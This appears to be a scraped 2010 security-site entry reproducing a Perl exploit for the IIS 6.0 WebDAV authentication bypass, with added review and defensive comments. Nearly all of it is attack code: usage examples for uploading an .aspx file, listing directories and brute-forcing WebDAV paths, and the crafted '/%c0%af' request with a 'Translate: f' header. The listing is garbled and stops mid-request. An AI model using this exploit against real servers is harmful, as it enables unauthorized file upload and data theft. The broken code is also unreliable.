IIS 6.0 remote overflow vulnerability-vulnerability warning-the black bar safety net

2010-10-04T00:00:00
ID MYHACK58:62201028013
Type myhack58
Reporter 佚名
Modified 2010-10-04T00:00:00

Description

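Exploit code for a Microsoft IIS 6.0 vulnerability. The page title calls it a remote overflow, but the script's own header below describes it as a WebDAV authentication bypass.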

exp:

!/ usr/bin/perl

* !!! WARNING!!! *

* FOR SECURITY TESTiNG ONLY! *

*****

MS IIS 6.0 WebDAV Auth. Bypass Exploit v1. 1

v1. 1 add brute force dir fuction.

v1. 0 download? upload and list dir.

Usage:

IIS6_webdav.pl -target-port-method-webdavpath-BruteForcePath [-file]

-target eg.: 192.168.1.1

-port eg.: 8 0

-method eg.: g

(p:PUT,g:GET,l:LIST)

-webdavpath eg.: webdav

-BruteForcePath eg.: brute force webdav path

-file (optional) eg.: test. aspx

Example:

put a file:

IIS6_webdav.pl -t 192.168.1.1-p 8 0-m p-x-webdav-f test. aspx

get a file:

IIS6_webdav.pl -t 192.168.1.1-p 8 0-m g-x-webdav-f test. aspx

the list of dir:

IIS6_webdav.pl -t 192.168.1.1-p 8 0-m l-x webdav

brute force + list dir:

IIS6_webdav.pl -t 192.168.1.1-p 8 0-m l-b dirdic.txt

brute force + get the file:

IIS6_webdav.pl -t 192.168.1.1-p 8 0-m g-b dirdic.txt -f test. aspx

use IO::Socket;use Getopt::Long;

use threads; use threads::shared;

Globals Go Here.

# Storage for the command-line options parsed below.
# NOTE(review): in this extracted listing the declarations have been folded
# onto one line, so everything after the first '#' is comment text and only
# $target is actually declared here. No `use strict` is visible in this
# excerpt, so the other names would be package globals as shown.
my $target; # Host being probed. my $port; # Webserver port. my $method; # HTTP Method, PUT GET or . my $xpath; # WebDAV path on Webserver. my $bpath; # Bruteforce WebDAV path. my $file; # file name. my $httpmethod; my $Host_Header; # The Host header has to be changed

# Parse the command line: target, method, xpath, bpath and file are string
# options, port is an integer option. The help entry's callback prints the
# banner via hello() and exits with status 0.
# NOTE(review): the stray ';' after "target=s" and the "help?" spec look like
# extraction damage (compare the broken entity in the usage text) - this call
# does not parse as shown.
GetOptions( "target=s" ; => \$target, "port=i" => \$port, "method=s" => \$method, "xpath=s" => \$xpath, "bpath=s" => \$bpath, "file=s" => \$file, "help?" => sub { hello(); exit(0); } );

# Collect one message per missing required option in $error. The WebDAV path
# requirement is met by either -xpath or -bpath.
# NOTE(review): the last test compares $method to "l" with the numeric
# operator `!=`. Both single-letter operands numify to 0, so the file-name
# check cannot fire for the method letters this script accepts; a string
# comparison (`ne`) is what the error message implies.
$error .= "Error: You must specify a target host\n" if ((!$ target)); $error .= "Error: You must specify a target port\n" if ((!$ port)); $error .= "Error: You must specify a put,get or list method\n" if ((!$ method)); $error .= "Error: You must specify a webdav path\n" if ((!$ xpath) && (!$ bpath)); $error .= "Error: You must specify a upload or download file name\n" if ((!$ file) && $method != "l");

# Any accumulated message aborts the run after printing a usage hint.
# NOTE(review): "\ n" is presumably a damaged "\n" from extraction - confirm.
if ($error) { print "Try $0-help or -?' for more information.\ n$error\n" ; exit; }

# Print the banner. hello() is defined outside this excerpt.
hello();

# Translate the one-letter -method value into the HTTP verb stored in
# $httpmethod: p -> PUT, g -> GET, l -> PROPFIND. Any other value prints a
# rejection message and exits with status 0.
if ($method eq "p") { $httpmethod = "PUT"; } elsif ($method eq "g") { $httpmethod = "GET"; } elsif ($method eq "l") { $httpmethod = "PROPFIND"; } else { print "$method Method not accept !!!\ n"; exit(0); }

******

* We testing WebDAV methods first *

******

# webdavtest() is defined outside this excerpt. Judging by the banner text
# around this call it checks the server's WebDAV methods before anything
# else is sent - confirm against its definition.
webdavtest($target,$port);

end of WebDAV testing.

******

* We try to brute forceing WebDAV path *

******

# When -bpath was supplied, $xpath is overwritten with whatever webdavbf()
# returns for that word list. webdavbf() is defined outside this excerpt.
if ($bpath) { $xpath = webdavbf($target,$port,$bpath); }

end of brute force

# Build the header text ($Host_Header) that will follow the request line,
# one variant per HTTP verb chosen earlier.
# NOTE(review): this listing is extraction-damaged ("x-6 0", "\ n", "& lt;",
# an operator missing between open() and die(), bare prose lines where
# comments used to be) and does not compile as shown.
#
# NOTE(defense): what this block plus the request line after it put on the
# wire is a `Translate: f` header (PUT and GET) together with a URI that
# starts with the overlong-encoded sequence `/%c0%af` ahead of the WebDAV
# path. `Translate: f` on its own is also sent by ordinary WebDAV clients,
# so log and IDS matching should key on the combination. Disabling WebDAV
# on hosts that do not need it removes this request path entirely.
print "-" x-6 0 ."\ n"; if ($httpmethod eq "PUT") { my $content; my $data;

cacl file size

# PUT: take the local file's size with -s and report it. As shown, everything
# after the first '#' on the next line is comment text, so the binmode/read
# loop and close() are not executed in this extracted form.
$filesize = -s $file; print "$file size is $filesize bytes\n"; open(INFO, $file) die("Could not open file!"); #@lines=<INFO>; binmode(INFO); #binary while( read(INFO, $data, $filesize)) { $content .= $data; } close(INFO);

print $content;

# PUT headers: Translate: f, Host, Content-Length set to the file size.
# GET headers: Translate: f, Host, Connection: close.
# PROPFIND headers: Host, Connection: close, Content-Type text/xml and
# Content-Length: 0, after which an XML propfind body is appended even though
# the declared length is 0.
# The closing print announces the verb and file name between separator rules.
$Host_Header = "Translate: f\r\nHost: $target\r\nContent-Length: $filesize\r\n"; } elsif ($httpmethod eq "GET") { $Host_Header = "Translate: f\r\nHost: $target\r\nConnection: close\r\n\r\n"; } elsif ($httpmethod eq "PROPFIND") { $Host_Header = "Host: $target\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n"; $Host_Header = $Host_Header."& lt;? xml version=\"1.0\" encoding=\"utf-8\"?& gt;<D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>"; } print "-" x-6 0 ."\ n$httpmethod $file , Please wait ...\n"."-" x 6 0 ."\ n";

**** **

* Sending HTTP request *

******

if ($httpmethod eq "PUT") { @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header\r\n$content",$target,$port,1 0);
